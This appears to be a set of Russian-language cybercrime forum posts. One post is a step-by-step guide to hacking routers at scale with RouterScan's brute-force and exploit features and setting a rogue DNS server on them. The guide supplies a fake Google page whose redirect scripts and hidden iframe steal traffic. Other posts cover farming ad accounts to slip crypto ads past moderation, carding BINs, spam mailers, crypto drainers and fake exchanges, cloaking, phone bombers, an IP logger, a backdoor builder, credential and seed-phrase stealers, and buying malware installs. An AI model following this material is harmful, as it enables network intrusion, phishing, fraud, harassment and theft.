залива — жесткий беспощадный фарм активностью. Да, без шуток, исход запуска
рекламы зависит НЕ от того, как вы настроите кампанию или оформите крео
рекламы , а по большей части непосредственно от трастовости вашего профиля
(именно наличия активности).
Долгой модерации в твиттере как токовой нет, ты запускаешь объявление, оно в
течении 5-10 минут начинает крутить, если аккаунт плохо зафармлен — то придёт
бан даже без показов или с малым количеством показов, если фарм средний — то
бан на 5-10к показов, если фарм отличный и всё сделано правильно — стабильный
открут на 100к + аудитории. На сколько я осведомлён, то модерация тут проходит
параллельно откруту, от того и такая логика блокировок. Аккаунт херня —
твиттер сходу видит это и блочит даже не пуская вашу реклу в выдачу, если
аккаунт средний — сначала пропускает на открут но потом более тщательно
прочекивает акк и блочит через n промежуток времени открута, аккаунт жирный —
аналогично.
**_• Плохой фарм:
• Средний фарм:
**_
_• Отличный фарм:_
__****
Авторизовываемся в аккаунте через куки или auth_token (важно для траста)
После авторизации попадаем в новостную ленту, немного скролим вниз и под любым популярным постом пишем GM или что-то подобное, по желаю ставим пару лайков
Закрываем профиль и даём полежать минут 15 (в это время авторизовываем другие акки, а если аккаунт только один, то ищем себе другие занятие, а не окисляем себе мозг в тик-ток)
Потом опять заходим и проявляем адекватную, подчёркиваю, адекватную и плавую активность. НЕ делаем по 30 подписок в минуту и кучу лайков на каждый попавшийся пост, это сразу минус траст и + возможный теневой бан. Рандомизируйте действия, откройте 10 профилей в антике и поочерёдно в каждой вкладке по очереди ставьте по 1 лайку и подписке от первого до десятого аккаунта, потом начинайте сначала, но проявляйте уже другую активность: комментарий, написать полноценный уникальный пост про крипту сгенерированный чатом гпт, ретвиты и т.д).
После трёх таких заходов можно заходить в рекламный кабинет и вязать карту:
После вяза начинается ультра БАЗА, которая и играет ключевую роль в запуске — 24 или 72 часовой фарм.
Да-да, просто берём и на протяжении суток (минимум) или нескольких дней периодически открываем профили и делаем живую(cyкa!) активность.
3. Запускаем ADS
После двухдневного фарма мы почти у цели, осталось перейти в ADS и создать нетригерящую ботов кампанию.
Важные моменты при создании:
️Спонтанная фишка: Попробуете использовать невидимый пробел из предыдущей статьи про юникод, чтобы протолкнуть крипто-текст (с гуглом же работает). Если работает — люто жестите и не упускайте шанс.
Пошагово расписывать процесс создания кампании не считаю целесообразным, не для детской аудитории ж стараюсь, просто приложу видос:
ЭТО БАЗА. ВСЕХ КАРТ РАСКРЫВАТЬ НЕ БУДУ. ДУМАЙТЕ.
You must have at least 10 reaction(s) to view the content.
Good luck and leave a like
Уважаемые обитатели форума, подскажите пожалуйста не очень опытному человеку,
как или где правильно подбирать карж карты под залив рекламы?
Я не совсем понимаю как правильно выбирать бины
Всем привет! Не так давно нашёл мануал по сливу трафика на партнёрку ( но в вашем случае можно сливать на любой ваш проект), прочитав его и что-то добавив и подредактировав я решил выложить сам способ сюда. За актуальность способа не ручаюсь.
Перед тем как приступать к реализации, тем, кто совсем не разбирается в полезно будет ознакомиться с теорией:
DNS (Система Доменных Имен) - это система предоставляющая возможность узнать
ип адрес ресурса по доменному имени. Когда ты вводишь в адресной строке
браузера yandex.ru
, первым делом браузер отправляет запрос на получение ип
адреса куда нужно отправить пакет. Можно создать свой днс сервер и указать его
в параметрах подключения, тогда запросы будут отправляться ему. Схема
резолвинга доменного имени такова: DNS кеш -> Системный файл hosts -> DNS
сервер указанный в параметрах подключения.
Т.е. DNS нужен для того, чтобы хранить базу соответствия между IP-адресами и доменными именами. Эта система преобразует как доменные имена в IP-адреса, так и осуществляет обратное преобразование - из IP-адреса в доменное имя. Адрес DNS-сервера может прописываться в настройках подключения к интернету. Он может выдаваться автоматически. Если сервер DNS по какой-то причине вышел из строя, то соединение с интернетом не пострадает, но ни одно доменное имя не сможет быть преобразовано в IP-адрес. Проще говоря, при наборе доменного имени любого сайта в браузере, пользователю будет выдаваться ошибка.
Что нам нужно в итоге:
Нам нужна партнёрка или же проект, на который будем сливать траффик
Фишинговый сайт в котором будет скрипт редиректа с ожиданием.
Сайт, конечно же, должен быть популярный. Это значит, что обращается к адресу
данного сайта наш пользователь должен очень часто. К примеру: google, Yandex,
yahoo и тому подобное.
Панель сервера DNS при помощи которого будет осуществляется переход пользователя на сайт с редиректом.
Маршрутизаторы с которых будем сливать трафик.
Для этого будем использовать утилиту RouterScan.
Проект или партнёрка
С проектом всё просто, вам нужна лишь ссылка на ваш лэнд, фейк и тд.
Теперь по поводу партнёрки.
В нашем случае наиболее выгодная партнёрка – https://bongacash.com
Именно с это партнёрской программой мы будем работать в дальнейшем, она удобна выводом заработанных средств на BTC кошелёк и высокой оплатой за регистрацию ( до 4.5$ ).
Нам нужно зарегистрироваться в партнёрке, и взять оттуда реферальную ссылку RevShare:
Сайт
Будем использовать обычную пустую страничку, на которой будет задержка в 5 секунд. Этого достаточно для того, чтобы слить трафик на партнерку. В общем случае нам протребуется 2 сткрипта.
Вот пример первого скрипта:
Code:Copy to clipboard
<script language="JavaScript">
var limit="0:3" // время в формате минуты : секунды
if (document.images){
var parselimit=limit.split(":");
parselimit=parselimit[0]*60+parselimit[1]*1
}
function timerstart(){
if (!document.images)
return
if (parselimit==1)
window.location="https://www.google.co.uk/" // куда перекинуть
else{
parselimit-=1;
setTimeout("timerstart()",1000)
}
}
</script>
И второго:
Code:Copy to clipboard
<script type="text/javascript">
setTimeout(function(){
location="https://www.google.co.uk/";
}, 5000);
</script>
Сама страница полностью пустая, чтоб выглядеть как обычное окно, ожидающее вывода сайта. Вот готовый пример для страницы гугла:
Code:Copy to clipboard
<html>
<head>
<title>Google</title>
<link rel="shortcut icon" href="/images/favicon.png" type="image/png">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
body {
background-color: #FAFDFF;
margin: 0px;
padding: 0px;
font-size: 12px;
color: #000;
font-family: Georgia, Helvetica, sans-serif;
}
b {
color: #00008B
}
.promo {
color: #AF0032;
font-size: 12px;
text-align: center;
margin-top: 20px
}
.promo a:link, .promo a:visited, .promo a:hover {
color: #0066CC;
text-decoration: underline;
}
</style>
</head>
<script type="text/javascript">
var limit = "0:3"
if ( document.images ){
var parselimit = limit.split(":")
parselimit = parselimit[0] * 60 + parselimit[1] * 1
}
function timerstart(){
if ( !document.images )
return
if ( parselimit == 1 )
window.location = "https://www.google.co.uk/"
else{
parselimit -= 1
setTimeout("timerstart()", 1000)
}
}
</script>
<script type="text/javascript">
setTimeout(function(){ location = "https://www.google.co.uk/"; }, 5000);
</script>
<body onLoad="timerstart()">
<iframe width="0" height="0" frameborder="0" src="http://url/to/tds"></iframe>
</body>
</html>
Так же в данную страницу встраиваем iframe (или скрипт) для слива на нашу партнёрку или проект, это можно увидеть в коде примера:
Code:Copy to clipboard
<iframe width="0" height="0" frameborder="0" src="http://url/to/project"></iframe>
Ну и конечно же, устанавливаем иконку гугла для вкладки, чтобы пользователь думал что чего от него ждет.
Панель DNS
Для начала требуется регистрация собственного DNS сервера здесь
https://www.cloudns.net/private-dns-servers/lang/ru/. Тут нам придётся
купить самый дешёвый ДНС сервер за 30$. Из колонки справа выбираем сервер по
нужному гео.
В моём примере рассмотрим панель Plesk - hosting panel. Предполагая, что вы приобретёте себе сервер с панелью управлением типа Plesk. Если у вас будет другая панель, то разберётесь по аналогии. Переходим в панель.
Затем открываем управление доменами и выбираем добавить домен. В меню добавления доменов, вписываем домен, который часто посещает пользователь, при этом у данного домена должны быть и другие зоны помимо com. Это нужно чтобы скрипт редиректа перекинул пользователя именно на настоящий сайт, но в другой зоне. Почему?Потому что зону com занял ты своим фейком. На странице примера в коде, увидишь, что скрипт перекидывает пользователя на тот же гугл, но в другой доменной зоне. Добавим домен:
При добавлении домена нужно указать пользователя, который будет управлять этим доменом. После заполнения всех пунктов и добавления домена, будет выдан днс сервер. Посмотреть его можно нажав на созданный домен в разделе домены, где ты попадешь в меню настроек и других действий с сайтом. В этих настройках перейди в настройки DNS:
В настройках ДНС берём ИП адрес сервера:
Запись "А", это ваш ДНС сервер, который необходимо указать в парметрах для подмены сайта google. Ну и конечно же, нужно залить на сервер файлы фейкового сайта:
Всё! Фейк ДНС сервер готов, теперь можем приступать к поиску роутеров.
Теперь нужно данный фейковый днс, установить на взломанных роутерах как первичный DNS и тогда пользователь при вводе в браузер адрес сайта google.com будет попадать на твой фейк. Да, и обязательно вторичный днс нужно указать настоящий, например от google это 8.8.4.4 или 8.8.8.8. Это сделать нужно обязательно. Потому что при поиске других сайтов, которых на нашем днс нет, будет обращение ко вторичному серверу для поиска этих доменов, а если его не будет, то и сайты не будут открываться, кроме нашего фейка.
Итак, займемся поиском роутеров, для подмены ДНС. Для этого будем использовать Route Scan, который можно скачать здесь(кликабельно). Запускаем сканер:
Теперь нужно добавить диапазоны и выбрать функцию брута роутеров и взлом эксплойтами, которые входят в набор данного софта. Дианазоны можно взять например тут – https://countryipblocks.net/acl.php, с обычного браузера на этот сайт зайти не получится, поэтому придётся заходить через Tor. После того как мы зашли на сайт, указываем в правой колонке “IP Range”, а в левой колонке указываем нужную нам страну, например Украину. В комплекте с софтом также идет инструкция на русском в которой все подробно расписано.
Вбив диапазоны, жмём старт и ждём результатов.
После того как у вас будут доступы, идите в настройки роутера, вбив его IP адрес в URL и ставь им ранее созданный фейковый первичный ДНС сервер.
После перехода в админку роутера, моделей которых куча и настройки у всех расположены по-разному.
Сохраните настройки и всё. Теперь пользователь, при попытке попасть на сайт google, будет перенаправлен на ваш фейк, где произойдёт слив трафика и редирект
Здравствуйте!
Очень много приходит вопросов о том, как сделать небольшую рассылку на 10 000
Записал небольшое видео с подробной инструкцией.
Материалы из видео:
RusDotMailer
Хостинг
Конктрутор писем
Хотите начать заниматься рассылками?
Подписывайтесь на канал по рассылкам.
Hello!
I get a lot of questions about how to do a small mailing for 10,000 to 20,000
emails without getting too bogged down.
I've recorded a short video with detailed instructions.
To watch videos subtitled in English or any other language,go to the
YouTube
link
_and turn on subtitles.
_
Materials from the video:
RusDotMailer
Хостинг
Конктрутор писем
Do you want to start a mailing list?
Sign up for the mailing list channel.
Доброго дня, прошу подсказать:
Софт от Aels - [mass-mailer](https://github.com/aels/mailtools/tree/main/mass-
mailer)
Биги - gmail
Текст обычный, рандомизированный. С другим емейлом в Reply-to.
Софт рассылает базу gmail в 100к примерно за 20 мин. Поначалу в инбоксе, в
самом начале. Но достаточно быстро начинает все идти в СПАМ папку.
Подозревая что слишком высокая скорость.
В этом вероятная проблема?
author: Kaushal_pal
start date: late 2022
You must have at least 5 reaction(s) to view the content.
если есть у кого варианты буду благодарен за линки.
Добрый вечер коллеги. Кто-то пробовал лить на дрейнер через ТикТок?
Все команды льют на связку фейк биржа + саппорты с разводом на депозит.
Но у меня есть чувство, что если попадать в криптоаудиторию лучше будет
показывать себя дрейнер.
Что думаете по этому поводу? Стоит потестить? Если есть кто льет ТикТок на
биржу отпишите.
Может кто подскажет хороший сервис для клоакинга?
Софт взят на просторах. Проверяйте на вирусы самостоятельно и по возможности открывайте на ВМ.
1.
You must have at least 5 reaction(s) to view the content.
Приватный бомбер - До 10000 сообщений в минуту
При первом входе попросят код для активации вводим это "mobi50"
2.
You must have at least 5 reaction(s) to view the content.
Turbo Bomber - Самый лучший бомбер на сегодняшний день, около 200 звонков в минуту.
3.
You must have at least 5 reaction(s) to view the content.
Бомбер "антихрист". Один из самых первых бомберов на просторах интернета.
4.
You must have at least 5 reaction(s) to view the content.
Мощнейший бомбер - Не советую тестить на себе т.к. просто не сможете его отключить из-за поступающих на телефон звонков и СМС.
5.
You must have at least 5 reaction(s) to view the content.
Mail Spammer (Почтовый бомбер)
1. Переходим на сайт
2. Вводим почту, которую нужно забомбить
3. На неё залетает 1000 писем
6.
You must have at least 5 reaction(s) to view the content.
IP LOGGER - Лучшая утилита, с помощью которой вы сможете узнать IP и координаты почти любого человека с помощью сгенерированной ссылки.
7.
You must have at least 5 reaction(s) to view the content.
Мощный СМС бомбер для Андроид.
Работает для всех стран, с отличной стабильностью,
примерно 1 сообщение в 1-3 секунды.
Помимо сообщений идут звонки с различных
стран.
8.
You must have at least 5 reaction(s) to view the content.
Бомбер 20-40 сообщений, 1-3 звонка в минуту.
Пользуйтесь
для развлечения можно покидать бомбер
гадалкам они телефон в шапке профиля оставляют.
9.
You must have at least 5 reaction(s) to view the content.
MSFGAF Backdoor - С помощью этого софта вы можете создать зловредный файл, при запуске которого на устройстве жертвы, вы получаете доступ к файлам на хранилище и прочей ценной информации.
10.
You must have at least 5 reaction(s) to view the content.
Приложение для смены MAC-адреса на Android - с его помощью вы сможете сменить
MAC-адрес вашего устройства на рандомный или же на тот, который будет прописан
вами в ручную.
Использование осуществляется следующим образом:
Первым делом сканируем сеть любой предназначенной для этого программы.
Затем копируем парочку MAC адресов.
Меняем MAC в программе на скопированный.
Заходим в сеть только, когда оригинал выйдет из нее.
️Для
использования софта обязательно наличие Root прав
11.
You must have at least 5 reaction(s) to view the content.
Privatezilla. Отличный инструмент для настройки приватности в Windows 10.
Функционал:
• Удаление определенных предустановленных приложений.
• Удаление OneDrive
• Открепление меню "Пуск"
• Отключение телеметрии сторонних приложений.
• Удаление Windows Defender
• Блокировка телеметрии через брандмауэр и файлы хоста.
12.
You must have at least 5 reaction(s) to view the content.
Мощный бомбер на телефон
1. Скачивай бомбер.
2. Води номер телефона, без +7, она там уже стоит.
3. Ставь кол-во сообщений. (До 99)
4. И нажимай "начать атаку"
13.
You must have at least 5 reaction(s) to view the content.
CookieChecker Deluxe (Чекер куки)
14.
You must have at least 5 reaction(s) to view the content.
CPP Browser Decryptor (Декриптор)
15.
You must have at least 5 reaction(s) to view the content.
Seed watcher (Сид-фразы)
16.
You must have at least 5 reaction(s) to view the content.
MailChecker (Чекер мыл)
Hidden content for authorized users.
Программа курса
БЛОК 1 - АУДИТЫ, КОНКУРЕНТЫ
Вступление или как правильно проходить курс
Обновленный чек-лист 10
Как правильно проходить курс:
- Для владельцев магазинов
- Для владельцев сайтов услуг
- Для владельцев инфосайтов
Сайт в разработке
Поиск и анализ конкурентов, построение сводной таблицы
Технический анализ сайта
Все про частотность запросов и операторы работы с запросами
Словарь терминов, с которыми мы будем работать
Программы и Сервисы, с которыми мы будем работать
Работа по чек-листу на живом примере
Анализ шаблонных элементов
Как найти прогера
Прототипирование
Построение сводной таблицы КФ
Начало разработки нового сайта
Настройка Метрики - целей и сегментов
Поиск спама в категориях
Быстрое лечение Бадена
Как проверять правки
Базовая настройка Key Collector
Домашнее задание в двух вариантах
БЛОК 2 - СЕМАНТИКА ДЛЯ ПРОДВИЖЕНИЯ ПО ТРАФИКУ
Дорожная карта модели продвижения по трафику
Текущая структура
Построение гибридной структуры конкурентов
Построение структуры при помощи автоматизированных сервисов
Сбор семантики Букварикс
Чистка
Выгрузка видимости
Домашнее задание в двух вариантах
БЛОК 3 - СЕМАНТИКА ДЛЯ ПРОДВИЖЕНИЯ ПО ТРАФИКУ ПРОРАБОТКА
Перенос текущей структуры в базовую семантику
Расширение и черновая кластеризация
Сопоставление частотности
Финальная доработка - теория
Финальная доработка - практика
Подготовка маркерной семантики
Маркерная привязка
Сбор параметров и чистка
Домашнее задание в двух вариантах
БЛОК 4 - ЧИСТОВАЯ СТРУКТУРА КАТЕГОРИЙ, ВНЕДРЕНИЕ
Проработка чистовой структуры категорий
О внедрении категорий
Построение плитки тегов в категориях
Построение плитки тегов в карточках
Генережка
Аналитика результатов внедрения и корректировки
Домашнее задание в двух вариантах
БЛОК 5 - ВНЕДРЕНИЕ СТРУКТУРЫ
Частые проблемы прошлого блока
ВСТУПЛЕНИЕ
Подготовка мета тегов
Анализ семантики
Генережка
Проработка чистовой структуры категорий
О внедрении категорий
Расширенный урок по внедрению технологий с примерами
2 структуры - основная и SEO структура
Создание и настройка категорий, характеризующих одно и то же
Аналитика результатов внедрения и корректировки
ДОМАШНЕЕ ЗАДАНИЕ В ДВУХ ВАРИАНТАХ
ОБЩИЙ АЛГОРИТМ ПРОДВИЖЕНИЯ ПО ТРАФИКУ
БЛОК 6 - СЕМАНТИКА ДЛЯ ПРОДВИЖЕНИЯ ПО ПОЗИЦИЯМ
Дорожная карта модели продвижения по позициям
Семантика для позиционного продвижения
Keys.so для позиционки
КЛАСТРИЗАЦИЯ и параметры и теги
Анализ семантики
Использование Кей Коллектора для анализа семантики
Полная выгрузка LSI
Режим HARD
ДОМАШНЕЕ ЗАДАНИЕ В ДВУХ ВАРИАНТАХ
БЛОК 7 - ВНЕДРЕНИЕ ПОЗИЦИОНКИ
Про отслеживание позиций
Тестирование SEO текстов
Контент необходимый для ранжирования
Способы внедрения активных элементов
заполняем таблицу с активными элементами
Примеры внедрения и результаты
Разбираем по шагам процесс вывода основного запроса - ОГНЕТУШИТЕЛЬ
Алгоритм в двух словах, как его использую я
ДОМАШНЕЕ ЗАДАНИЕ В ДВУХ ВАРИАНТАХ
БЛОК 8 - ИНФОРМАЦИОНКА
SEO тексты - теория
Семантика для сео текстов
Информационка - ТЗ
Поиск копирайтеров и контроль исполнения
Разбираем живые примеры информационных сайтов
БЛОК 9 - УГЛУБЛЕННЫЕ ТРАФИКОВЫЕ ТЕХНОЛОГИИ
Сопоставление категорий и позиций, поиск слабых категорий
Активная семантика
БЛОК 10 - УГЛУБЛЕННЫЕ ПОЗИЦИОННЫЕ ТЕХНОЛОГИИ
Примеры продвижения запросов в идинственном числе на категории во
множественном числе через теги
Хитрые схемы построения плитки тегов без создания конечных страниц
Контролируемый спам
БЛОК 11 - УГЛУБЛЕННЫЕ ТЕХНОЛОГИИ ПРОДВИЖЕНИЯ ИНФОРМАЦИОНКИ
Плитка тегов для информационки
БЛОК 12 - ФИШКИ ДЛЯ ИНТЕРНЕТ-МАГАЗИНОВ
Основы конверсии и юзабилити
Анализ конверсий по сегментам и поиск путей оптимизации
Инструменты увеличения конверсии
Тепловые карты и вебвизор
Правильные названия товаров
Парсинг
Методы расширения товарной матрицы
Фильтратор, как активный элемент
ПРАВИЛЬНО НАЗЫВАТЬ ТОВАРЫ
умный скрипт АВТОНАПОЛНЕНИЯ КАТЕГОРИЙ
Гибридный фильтратор
БЛОК 13 - ФИШКИ ДЛЯ САЙТОВ УСЛУГ
Накрутки ПФ
Ширина охвата семантики
БЛОК 14 - ДРОПЫ И ССЫЛКИ
Дропы и сателлиты
Ссылки - теория
Ссылки - практика
Вступление
покупка на Sape в автоматическом режиме
Покупка на Миралинкс
Покупка на PR.SAPE
Покупка на GoGetLinks
Крауд маркетинг
Ссылочные стратегии:
Общие положения
Для магазинов
Для сайтов услуг
Для инфосайтов
Линкбилдинг
БЛОК 15 - ДЛЯ ВЛАДЕЛЬЦА САЙТА
как выбрать и контрлировать сеошника
как сеошники обманывают
Как выстроить внутренний отдел продвижения
БЛОК 16 - СОВЕТЫ ДЛЯ SEO СПЕЦИАЛИСТА
Про гарантии в сео
Как провести анализ сайта
Как допродавать сео услуги
Как вести клиента по разработке - моя модель
Инструменты, которые я сам использую
Шаблоны договоров
Делегирование
Вилка тарифов на SEO
Вилка тарифов на разработку
Как общаться с клиентами, чтобы не было проблем
Таблица где и как брать клиентов
Типичные проблемы сайтов и пути их решения
Как правильно уйти на фриланс из студии
БЛОК 17 - СОВЕТЫ ДЛЯ РАЗРАБОТЧИКА
Дорожная карта
Плюсы минусы движков
Доработка существующего сайта или создание нового с нуля. Плюсы и минусы. Как
принять правильное решение.
Разработка магазинов
Схема от А до Я: выбор движка, подбор исполнителя, написание ТЗ, корректировка
шаблона (отрисовка дизайна), когда открывать сайт к индексации
Разработка сайтов услуг
Схема от А до Я: выбор движка, подбор исполнителя, написание ТЗ, корректировка
шаблона (отрисовка дизайна), когда открывать сайт к индексации
БЛОК 18 - СЕТИ САЙТОВ И МУЛЬТИРЕГИОНАЛЬНОСТЬ
Основы мультисайтовости
Расширенный урок
БЛОК 19 - ИНФОБИЗНЕС
Построение личного бренда
Как вести свой паблик ВК основы
Как настроить рассылку в Senler
Вебинарная модель запуска и ее приенимость для продажи услуг
Инфобизнес - пошаговая модель запуска курса
Основная воронка
Запуск вебинара
Допродажи
БЛОК 20 - РЕШЕНИЕ ПРОБЛЕМ С САЙТАМИ
Аналитика после запуска
Важность кармы домена и тестирование на сетках сайтов
Защита сайта и правовые вопросы
Использование чужих фотографий
бесплатные и платные стоки фото
Обязательнй пункт о защите обработки данных
оферта и не оферта
Защита сайта и действия при нечестных действиях конкурентов. накрутки пф,
копирования данных, отрисованного дизайна и тд.
Фильтры и санкции
Виды и классификация санкций
Прямые и косвенные признаки
Как найти, определить и подтвердить наличие фильтров
Как выводить сайт из-под фильтра, когда это надо, а когда не надо
Какие фильтры нужно уточнять у Платонов, а какие нет.
301 редирект при наличии фильтров и наследование проблем новым доменом
Внегласные фильтры поисковых систем, о которых молчит техподдержка
Подробная таблица с типовыми проблемами сайтов и путем решения
БЛОК 21 - РАЗБОР ПОЛЕЗНЫХ СЕРВИСОВ
Арсенкин
Keys.so
Keyassort
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12942-93-5-1.202201311201%2Ffavicon.ico&hash=553485cb86193839707e2c2fa3252b62&return_error=1) cloud.mail.ru
telegra.ph
возможно у кого то найдуться советы по правильному спаму дс?
если через скрипт спамить то через 10 сообщений уже начинает появляться капча а иногда даже выбивает из акка.
возможно стоит купить анти детект браузер и спаммить через десятки акков?
Всех благ уважаемые форумчане!
Хочу поинтересоваться какая клоака под траф сейчас самая актуальная/какаю сами
используете. Желательно с JS интеграцией, но это не столь принципиально.
P.S.
Только не советуйте хайдклик)
В наличии трафик из социальной сети. Человек кликает на рандомный пост
ногтевой тематики и попадает на мой преленд с рекламой. Один аккаунт
генерирует 200-700к кликов в день. Ежедневно могу создавать 2-3 аккаунта
которые в дальнейшем будут генерировать трафик 3-4 месяца. ЦА – Ж, 16-50,
интересующиеся темой ногти/маникюр, ГЕО - 50% US/50% MIX ENG TIR-1. 95%
мобильные просмотры. Идеально подойдет для установки какого-то моб приложения
связанного с темой ногтей/бьюти. Если есть идеи как этот трафик монетизировать
– в ЛС. Никаких оплат на расходники и т.д. не прошу. Готов запустить за % от
профита.
P.S. Крипто оферы сразу нет, акки уйдут в бан. Идеально подходят моб
приложения/товарка
Обсуждение получения трафика на криптофиши
Сегодня я вам расскажу, как пожизненно зарабатывать от 400$ уделяя работе 1
час в месяц.
И помогу избежать ошибок допущенных мною.
И так начнем. Все в курсе, что в интернете множество низко-конкурентных
многотысячных запросов, ниша которых не занята.
Все стремятся в ВЧ не всегда осознавая, что иногда можно заработать гораздо
больше по НЧ с наименьшими усилиями и затратами при нужном масштабировании. Но
достаточно лирики, перейдём к фактам.
И так, что нам нужно будет.
Ahrefs trial (7 баксов) + VPS 2gb RAM 10$/месяц я выбираю инферно (мне
нравится их тех.поддержка) (http://bit.ly/35v0nbG) + покупка ссылок и на
форумах и PBN (в среднем 1.5$ за ссылку или сам, если есть время) + контент по
адалту (40-50 руб/1к знаков) на advego.com или если есть время можно самому
Выбираем тематику. Хорошо, если тематика сайта в целом последовательна и не
скачет по разным тематикам (от гей порно до соло-девочек) - лучше что-то одно.
Делаем быстрый чек. Нам нужно найти трафик по таким запросам, которые не
сможет заблокировать РКН, и вам не нужно будет переезжать и делать зеркала на
новые домены (и прочий гемор), но и чтобы легкого трафика было достаточно, и
он был бы весь ваш.
Видим, что по слову "попа" достаточно много слов, конкуренция по которым минимальна, значит для простановки вашего сайта нужно минимальное количество бэков. И голая попа безопасна для РКН.
Дальше на ВПС устанавливаем любой бесплатный (можно и платный, если есть бюджет) шаблон и устанавливаем плагины, которые любит гугл.
Google Analytics, Wordfence, Yoast SEO, Smush, Schema и так далее. Чем больше ваш сайт будет иметь снипетов, разметок, обозначений что-куда , тем лучше для позиций. Гугл любит, когда всё имеет обозначение. Выбирайте наиболее структурированые шаблоны, но не перегружайте тяжёлыми шаблонами, которые жрут много CPU. Самые лучшие шаблоны - шаблоны на коленке.
Смотрите source-code шаблона, если там много мусора и ошибок - выбирайте другой. Проверяйте его работу на сайте через гугл Page speed https://developers.google.com/speed/pagespeed/insights/ , ибо не все разработчики дружат с головой и оптимизацией.
Заказываем текста. Вначале нам нужен небольшой бум из публикаций - хотябы в
пределах первого месяца . Минимум 10 публикаций (до 30) , в среднем 15.
Последующие месяцы по убыванию до 3-5 публикаций в месяц. Длинной 3-4к
символов, по всем законам СЕО. (к слову забудьте выделение сраных
- ключевиков, за это гугл сейчас банит) - Yoast SEO поможет
вам идеально оптимизировать текст для публикации.
Либо пишем сами за 2 дня, либо заказываем
Уникальные картинки - можно пиздить с интернет-галлерей типо flickr.com , там благо по нашей тематике контента завались, жоп хватает
потом заказываем бэк-линки или проспамливаем сами, благо ру-форумов на жирных площадках, которые не банят за хитро-вставленные ссылки - много. тотже кинопоиск.ру или смотра.ру , есть так же форумы *.gov.ru можете также поискать. dofollow и nofollow микс - 80/20 без прямых вхождений. Ссылки на форумах - прямая ссылка, ссылка с PBN или купленных статей на сайтах - ссылка с ключевым словом. Есть кто продает ссылки на .ru сайтах по 2-4 бакса (нелегально, но это на вашей совести) (за контактами в личку )
Основные правила поддержания сайта: 3-5 публикаций в месяц. 30-50 бэклинков с форумов и PBN. Всё это можно делегировать либо самому, либо платить.
Расходы: Домен (рекомендую новорег) (1$ в месяц) + VPS (10$) + контент (10$) + бэклинки (40$) = 61$ , или 11$ если контент и бэклинки добывать самому.
Прибыль: вы можете монитизировать адалт разными способами и на разных
конторах. (от сайт знакомств до ставок на спорт)
У меня лучше всего конвертиться у lospollos поп-андеры - ру.адалт выходит где-
то 1$ за кило трафа. или 400-500$ в месяц с каждого сайта.
Время на сайт: 1-3 часа в месяц, в зависимости от темпа работы.
Время вставание в топы новорега: от 6 месяцев до 2 лет.
Время жизни сайта: при соблюдении всех мер предосторожности - эта золотая кура будет вам нести пассивный доход много и много лет.
Масштабируйте такие адалт сайты. Работайте несколько дней в месяц, и зарабатывайте тысячи и тысячи долларов.
Успехов!
© disqus
Что внутри гайда?
• Подробный гайд, как запустить трафик и получать установки уже через пару
часов.
• 5 личных кейсов, которые объясняют что нужно делать, чтобы получать
уникальные установки на файл.
• В одном из кейсов поделился заходом, с помощью которого купил первое авто и
дом родителям.
Что узнаешь?
• Фундаментальные знание и понимание как работать с трафиком на любые темы. Все давно было придумано за тебя. Даже сейчас, тебе ничего не нужно придумывать. Просто бери, моделируй и получай установки.
Зачем тебе это читать?
• Если хочешь освоить навык в работе с трафиком и понимать как его
монетизировать. Или получать установки под любую страну и под устройства на
системе Windows. То эта информация для тебя будет полезной. Даже пробежавшись
по оглавлениям, у тебя будет полное понимание системы.
• Тебе не придется закупать установки, которые расходятся в десятки пар рук.
Будешь делать уникальные установки себе или тем, кто будет оплачивать твои
услуги. Или присоединишься в приватную команду и будешь заниматься тем, чем
нравится.
[> >Читать онлайн или скачать<<](https://mega.nz/file/8l5GQLzQ#8Amy55upWj4p8fU- wPQuzDwMbGaq8uCZIcgjnw8Nw7w)
Spoiler: Ссылка для скачивания
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
wPQuzDwMbGaq8uCZIcgjnw8Nw7w)
mega.nz
P.S Если есть вопросы, буду рад ответить в свободное время. В ЛС быстрее отвечаю.
Дорогие друзья и коллеги добро пожаловать в мой топик) В первую очередь я создал этот топик, чтобы поделиться возникшей дилеммой с сообществом и узнать мнение профессионалов по некоторым вопросам.
Коротенько расскажу кто я и о чем собственно речь.
Я на протяжении уже почти 6 лет занимаюсь добычей и обработкой рдп доступов.
В процессе работы опыта становиться всё больше, знаний становится больше,
инструментарий расширяется, команда пополняется новыми членами. Но рдп доступы
ограничивают дальнейшее развитие, по понятным причинам, материал очень
разношерстный, а частенько и вообще лысый.
По этим и ряду других причин я решил заняться настройкой нового потока
материала, который добывается при помощи трафика.
Если взглянуть на ситуацию с моей стороны, то этот ход вполне логичен. При
помощи оффера можно регулировать качество материала, а при помощи включения и
отключения рекламных кабинетов можно регулировать объем материала.
Звучит отлично, не прада ли)
Но вот я уже полтора месяца пытаюсь договориться с трафером и запустить этот
проект, но толку ноль. Я уже 7,5к заплатил и меня кинули, и отказывался
платить наперед. Соглашался и на % от открута, и на фикс за инсталл и на % от
прибыли.
Короче говоря с моей стороны я уже соглашался на любые условия, но у меня до
сих пор нет ниодного инсталла.
Так вот собственно господа профессионалы, отзовитесь, поделитесь своей
мудростью на этом непростом рынке
У меня есть текущие партнеры как черном бизнесе тут, так и в белом бизнесе в
оффе. И мне почему то кажется, что суть партнерства заключается в том что
каждый выигрывает. Как модно говорить сейчас схема win-win где каждый
побеждает.
Так же суть партнерства в том, что каждый вкладывает в проект максимум своего
опыта, знаний, наработок и усилий.
Так партгнерство вижу я и все остальные с кем мне удалось выстроить рабочие
продуктивные отношения.
Так вот о какой дилемме речь. Общаясь с траферами (не знаю реальные это
траферы были или все до одного кидалы) и все хотят чтобы я оплачивал трафик,
предоставлял офферы, предоставлял софты, конечно приватные, а они будут только
кабинеты включать и при этом они хотят % с прибыли, и оплату зу лиды.
Это что все так работают? Я просто не могу понять в чем суть парнерства тогда
вообще? Процент с прибыли то получают только партнеры. Фикс получают наемные
сотрудники.
Я пообщался уже с пол сотней траферов (кидал) хз кто они. И они аргументируют тем, что непонятно кто я такой и с чего это они будут наливать мне трафик за свои бабки, что я их потом кину. Но я то ведь так же как и они несу расходы, на софты для пролива, причем мои расходы существенно больше, если я правильно понимаю сколько стоит трафик.
Господа траферы, реально занятые в работе с инсталлами. Поделитесь информацией где вас искать и какое предложение вам интересно для долгосрочного взаимодействия? Как выстроена ваша работа?
